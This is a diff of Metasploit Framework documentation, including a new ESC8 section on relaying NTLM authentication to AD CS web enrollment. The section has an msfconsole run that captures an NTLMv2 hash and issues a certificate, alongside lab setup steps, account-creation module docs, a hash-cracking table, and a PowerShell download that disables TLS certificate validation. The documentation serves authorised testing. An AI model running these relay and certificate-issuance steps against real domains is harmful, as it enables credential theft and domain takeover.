 | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
 | ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
+| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
 | SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
 | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
 | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -18,7 +18,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult

 The current configuration can be printed by running `dns print`:

-```msf6
+```msf
 msf6 > dns print
 Default search domain: N/A
 Default search list:   lab.lan
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -75,7 +75,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
 - `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
 - `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
 - `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
@@ -96,6 +96,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
 - `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
 - `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+- `ENUM_PRE_WINDOWS_2000_COMPUTERS` - Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.

 ### Kerberos Authentication

@@ -169,7 +169,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -0,0 +1,41 @@
+Payloads for Metasploit Framework can now be tested when opening pull requests. This is handled by GitHub actions within 
+our CI, this workflow will build the payloads using the appropriate repositories and branches. It will then run our 
+acceptance tests against those changes. This requires adding GitHub labels for each corresponding payload repository. 
+The labels will contain the `payload-testing` prefix, each supporting testing for an external repository:
+ - `payload-testing-branch` ([https://github.com/rapid7/metasploit-payloads/](https://github.com/rapid7/metasploit-payloads/))
+ - `payload-testing-mettle-branch` ([https://github.com/rapid7/mettle/](https://github.com/rapid7/mettle/))
+
+**_Note_**:
+
+The long term aim is supporting workflow dispatches for this job, but that is currently not working as expected. So as a
+work-around we will need to edit the workflow locally. Once the testing has been completed ensure the following locally 
+changes are reverted before merging.
+
+Once the appropriate repository label is added, you will need to edit the GitHub workflow to point at the specific 
+repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
+the following lines like so:
+
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
+```yaml
+repository: foo-r7/metasploit-framework
+```
+
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
+```yaml
+ref: fixes-all-the-bugs
+```
+
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
+```yaml
+repository: foo-r7/metasploit-payloads
+```
+
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
+```yaml
+ref: fixes-all-the-payload-bugs
+```
+
+Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
+following lines would need updated:
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -10,6 +10,10 @@ flowchart TD
        update_template[<i>Update Template</i>]
        ESC4 -- abuse privileges --> update_template
    end
+    subgraph relay/esc8[<b>relay/esc8</b>]
+        ESC8(ESC8)
+        ESC8 --> web_enrollment[<i>Issuance via Web Enrollment</i>]
+    end
    subgraph icpr_cert[<b>icpr_cert</b>]
        ESC1(ESC1)
        ESC2(ESC2)
@@ -45,11 +49,12 @@ flowchart TD
    normal --> PKINIT
    normal --> SCHANNEL
    update_template --> ESC1
+    web_enrollment --> PKINIT
+    web_enrollment --> SCHANNEL
 ```

-The chart above showcases how one can go about attacking five unique AD CS
-vulnerabilities, taking advantage of various flaws in how certificate templates are
-configured on an Active Directory Certificate Server.
+The chart above showcases how one can go about attacking each of the AD CS vulnerabilities supported by Metasploit,
+taking advantage of various flaws in how certificate templates are configured on an Active Directory Certificate Server.

 The following sections will walk through each of these steps, starting with enumerating
 certificate templates that the server has to offer and identifying those that are
@@ -81,6 +86,7 @@ attacks that they found they could conduct via misconfigured certificate templat
  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
 - ESC7 - Vulnerable Certificate Authority Access Control
 - ESC8 - NTLM Relay to AD CS HTTP Endpoints
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc8]]

 Later, additional techniques were disclosed by security researchers:

@@ -110,8 +116,8 @@ Later, additional techniques were disclosed by security researchers:
  - [EKUwu: Not just another AD CS ESC](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc15]]

-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC13 and ESC15. As such,
-this page only covers exploiting ESC1 through ESC4, ESC13 and ESC15 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC13 and ESC15. As such, this page only
+covers exploiting that subset of ESC flaws.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -866,6 +872,55 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
 used to authenticate to Active Directory as the Domain Admin.

+# Exploiting ESC8
+ESC8 leverages relaying NTLM authentication from an SMB server (running on Metasploit) to the HTTP(S) AD CS Web
+Enrollment portal running on a remote target. The attacker will need to coerce a client with privileges to authenticate
+to the target portal to authenticate to Metasploit instead. This can be achieved via a few techniques, including name
+poisoning via the `capture` plugin, coercion via the `auxiliary/scanner/dcerpc/petitpotam` module, or even a well placed
+UNC path. Once authentication has been relayed and an authorized HTTP session has been established, the attacker can
+query available certificate templates as well as issue them.
+
+Exploitation of this flaw is facilitated through the `auxiliary/server/relay/esc8` module which handles starting the SMB
+relay server and enables configuration of what happens when relaying is successful. Users can select from different
+operational "modes" via the MODE datastore option which controls what the module will do. For a full description, see
+the modules documentation. The default mode, "AUTO" will issue a User certificate if the relayed connection is for a
+user account or a Machine certificate if it's for a machine account. Once this certificate has been issued, it can be
+used for authentication. See the [Authenticating With A Certificate](#authenticating-with-a-certificate) section for
+more information.
+
+In the following example the AUTO mode is used to issue a certificate for the MSFLAB\smcintyre once they have
+authenticated.
+
+```msf
+msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 172.30.239.85
+msf6 auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 1.
+msf6 auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Relaying to next target http://172.30.239.85:80/certsrv/
+[+] Identity: MSFLAB\smcintyre - Successfully authenticated against relay target http://172.30.239.85:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 172.30.239.85
+[SMB] NTLMv2-SSP Username   : MSFLAB\smcintyre
+[SMB] NTLMv2-SSP Hash       : smcintyre::MSFLAB:821ad4c6b40475f4:07a6e0fd89d9af86a5b0e12d24915b4d:010100000000000071fe99aa0a27db01eabcbc6e8fcb6ed20000000002000c004d00530046004c00410042000100040044004300040018006d00730066006c00610062002e006c006f00630061006c0003001e00440043002e006d00730066006c00610062002e006c006f00630061006c00050018006d00730066006c00610062002e006c006f00630061006c000700080071fe99aa0a27db01060004000200000008003000300000000000000001000000002000004206ecc9e398d7766166f0f45d8bdcf7708c8f278f2cff1cc58017f9acf0f5400a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000
+
+[*] Creating certificate request for MSFLAB\smcintyre using the User template
+[*] Generating CSR...
+[*] CSR Generated
+[*] Requesting relay target generate certificate...
+[+] Certificate generated using template User and MSFLAB\smcintyre
+[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=184&
+[+] Certificate for MSFLAB\smcintyre using template User saved to /home/smcintyre/.msf4/loot/20241025142116_default_172.30.239.85_windows.ad.cs_995918.pfx
+[*] Relay tasks complete; waiting for next login attempt.
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+```
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
@@ -873,7 +928,7 @@ administrative privileges, rather the privileges that are gained are those of th
 certificate template's issuance policy. The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module is capable of
 identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose
 permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the
-ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions.
+ESC13-Test template is vulnerable to ESC13 and will yield a ticket including the ESC13-Group permissions.

 ```
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
@@ -112,3 +112,19 @@ The following steps assume that you have installed an AD CS on either a new or e
 6. Click `Apply` and then click `OK` to issue the certificate.
 7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
 8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC8 Vulnerable Host
+1. Follow instructions for creating an AD CS enabled server
+2. Select Add Roles and Features
+3. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
+4. For each selection, accept the default for any pop-up.
+5. Accept the default features and install.
+6. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
+7. Under Credentials, accept the default
+8. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
+9. In CA for CES, accept the defaults
+10. In Authentication Types, accept the default integrated authentication
+11. In Service account for CES, select `Use built-in application pool identity`
+12. Accept default integrated authentication for CEP
+13. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
+14. Accept the remaining defaults.
@@ -30,10 +30,29 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 ### Windows

-If you are running a Windows machine
+#### Windows 10 or above

-* Install [chocolatey](https://chocolatey.org/)
-* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install [winget](https://learn.microsoft.com/en-us/windows/package-manager/winget/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
+* Install pcaprub dependencies from your PowerShell terminal:
+
+```
+[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')
+
+Expand-Archive -Path "C:\Windows\Temp\WpdPack_4_1_2.zip" -DestinationPath "C:\"
+```
+
+Install a version of PostgreSQL:
+
+```
+Install-Module -Name Microsoft.WinGet.Client
+Install-WinGetPackage -id PostgreSQL.PostgreSQL.17
+```
+
+#### Pre-Windows 10
+
+* Install [choco](https://chocolatey.org/install)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
 * Install pcaprub dependencies from your cmd.exe terminal:

 ```
@@ -46,7 +65,7 @@ choco install 7zip
 Install a version of PostgreSQL:

 ```
-choco install postgresql12
+choco install postgresql17
 ```

 ## Set up your local copy of the repository
@@ -82,7 +101,9 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+- Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+
+#### Linux

 ```bash
 cd ~/git/metasploit-framework
@@ -90,8 +111,20 @@ ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit
 ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge
 ```

+#### Windows
+
+```powershell
+cd ~/git/metasploit-framework
+mkdir .githooks
+git config --local core.hooksPath .githooks/
+New-Item -Path pre-commit -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+New-Item -Path post-merge -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+```
+
 ## Install Ruby

+ **Note:** If you are using Windows, ruby installed in [Install dependencies](#install-dependencies) section, so you can skip this section
+
 Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated.  Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict.  For these reasons, it is advisable  to use a Ruby manager.

 You could just install Ruby directly (eg. `sudo apt install ruby-dev`), but you may likely end up with the incorrect version and no way to update.  Instead, consider using one of the many different [Ruby environment managers] available.  The Metasploit team prefers [rbenv] and [rvm] (note that [rvm] does require a re-login to complete).
@@ -101,9 +134,9 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git
 ```
 $ cd ~/git/metasploit-framework
 $ cat .ruby-version
-3.0.2
+3.2.5
 $ ruby -v
-ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
+ruby 3.2.5 (2024-07-26 revision 31d0f1a2e7) [x86_64-darwin23]
 ```

 Note: the Ruby version is likely to change over time, so don't rely on the output in the above example.  Instead, confirm your `ruby -v` output with the version number listed in the `.ruby-version` file.
@@ -856,6 +856,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Loading-Test-Modules.md'
          },
+          {
+            path: 'Payload-Testing.md'
+          },
          {
            path: 'Measuring-Metasploit-Performance.md'
          }
@@ -0,0 +1,109 @@
+## Vulnerable Application
+Add, lookup and delete user / machine accounts via MS-SAMR. By default standard active directory users can add up to 10
+new computers to the domain (MachineAccountQuota). Administrative privileges however are required to delete the created
+accounts, or to create/delete user accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `ACCOUNT_NAME` option for `DELETE_ACCOUNT` and `LOOKUP_ACCOUNT` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### ACCOUNT_NAME
+
+The account name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`ADD_USER`, `LOOKUP_ACCOUNT` and `DELETE_ACCOUNT` actions. If left blank for `ADD_COMPUTER`, a random, realistic name
+will be generated.
+
+### ACCOUNT_PASSWORD
+
+The password for the new account. This option is only used for the `ADD_COMPUTER` and `ADD_USER` actions. If left 
+blank, a random value will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `ACCOUNT_NAME` is set, that value will be
+used and the module will fail if the specified name is already in use. If `ACCOUNT_NAME` is *not* set, a random value
+will be used.
+
+### ADD_USER
+
+Add a new user to the domain. The account being used to create the new user must have permission to do so. 
+
